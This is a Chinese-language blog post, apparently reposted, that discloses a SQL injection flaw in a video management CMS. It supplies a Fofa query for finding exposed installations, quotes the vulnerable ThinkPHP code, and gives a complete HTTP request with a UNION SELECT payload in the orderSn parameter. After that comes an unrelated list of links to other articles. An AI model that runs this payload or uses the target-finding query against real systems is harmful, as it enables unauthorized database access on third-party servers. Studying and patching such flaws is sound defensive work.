某思CMS V10存在SQL注入漏洞

news/2024/11/14 12:04:04/

Fofa:

product="魅思-视频管理系统"

框架:ThinkPHP 5,6

1 漏洞分析&复现

位于 /controller/Api.php 控制器中的getOrderStatus 方法POST传入,然后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生.

/**
* 查询订单支付状态
*/
public function getOrderStatus(Request $request)
{$orderSn = $request->post('orderSn/s', '');if (empty($orderSn)) die(json_encode(['statusCode' => 4003, 'message' => '缺少请求参数:orderSn不能为空']));$orderInfo = Db::name('order')->where("order_sn='$orderSn'")->find();if (!$orderInfo) die(json_encode(['statusCode' => 4005, 'message' => "can't find the orderSn"]));die(json_encode(['statusCode' => 0, 'message' => '', 'data' => ['orderStatus' => $orderInfo['status']]]));
}

Payload:

POST /api/getOrderStatus HTTP/1.1
Host: 127.0.0.1
Content-Length: 157
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
x-requested-with: XMLHttpRequest
Connection: closeorderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

sqlmap验证

 

来源于星悦安全 

 

 


http://www.ppmy.cn/news/1527482.html

相关文章

10分钟在企业微信中集成一个 AI 助手

10分钟在企业微信中集成一个 AI 助手

您只需 10 分钟,无需任何编码,即可为您的组织在企业微信上集成一个有大模型能力加成的 AI 助手。这个助手可以全天候(7x24)响应用户咨询,还能解答私域问题,成为您企业的专属助手,提升用户体验&a…
阅读更多...
Spring 定时任务与 XXL-JOB 灵活切换方案

Spring 定时任务与 XXL-JOB 灵活切换方案

在使用XXL—JOB的实现定时任务过程中,有时候可能由于部署环境的要求,就只能用Spring自带的实现方式。 所以为了通用性和灵活性,突发奇想地看看能不能实现在不修改原本Spring定时任务代码的前提下,通过配置灵活控制定时任务具体的实…
阅读更多...
C语言 | Leetcode C语言题解之第402题移掉K位数字

C语言 | Leetcode C语言题解之第402题移掉K位数字

题目&#xff1a; 题解&#xff1a; char* removeKdigits(char* num, int k) {int n strlen(num), top 0;char* stk malloc(sizeof(char) * (n 1));for (int i 0; i < n; i) {while (top > 0 && stk[top] > num[i] && k) {top--, k--;}stk[top]…
阅读更多...
汤臣倍健,三七互娱,得物,顺丰,快手,游卡,oppo,康冠科技,途游游戏,埃科光电25秋招内推

汤臣倍健,三七互娱,得物,顺丰,快手,游卡,oppo,康冠科技,途游游戏,埃科光电25秋招内推

汤臣倍健&#xff0c;三七互娱&#xff0c;得物&#xff0c;顺丰&#xff0c;快手&#xff0c;游卡&#xff0c;oppo&#xff0c;康冠科技&#xff0c;途游游戏&#xff0c;埃科光电25秋招内推 ①得物 【八大职类】技术、供应链、产品、运营、设计、职能、商品研究、风控等大类…
阅读更多...
影刀RPA实战:数据采集-IT数据书栈网

影刀RPA实战:数据采集-IT数据书栈网

1.实战目标 本次实战主要是采集书栈网上的学习书籍&#xff0c;我们打开网址&#xff0c;输入想要学习的IT知识&#xff0c;影刀机器人会自动将数据名称&#xff0c;链接地址&#xff0c;文档数量&#xff0c;收藏人次&#xff0c;阅读人次&#xff0c;及书籍介绍拉取下来&…
阅读更多...
xml中SQL执行错误(使用另外一张表的两个字段,组装SQL的where查询条件)

xml中SQL执行错误(使用另外一张表的两个字段,组装SQL的where查询条件)

SQL实现功能描述&#xff1a;根据系统设置中的商店到期提醒周期、单位&#xff0c;在过期提醒的列表中&#xff0c;对数据进行周期展示 错误复现&#xff1a; Mapper接口中抽象方法的定义如下&#xff1a; Page<ShopVo> queryList(Param(“vo”) ShopVo shopVo ,Page&…
阅读更多...
Jacoco的XML报告详解

Jacoco的XML报告详解

使用jacococli完成jacoco测试报告生成后,会看到有一个.xml结尾的文件,这个就是xml格式的覆盖率报告。除了xml还有csv、html格式的报告,本文进介绍xml报告。 DTD文件 在介绍jacoco的xml报告之前,我们应该先看一下对应的DTD文件的内容。(DTD的全称为Document Type Definitio…
阅读更多...
【Go - 类型断言】

【Go - 类型断言】

前提重点&#xff1a;类型断言&#xff0c;先转换 &#xff0c;再断言(判断是否转换成功) Go语言中&#xff0c;类型断言用于将接口类型的变量转换为具体类型。类型断言的语法如下&#xff1a; value, ok : interfaceVariable.(ConcreteType)interfaceVariable 是一个接口类型…
阅读更多...
最新文章

Copyright @ 2022~2023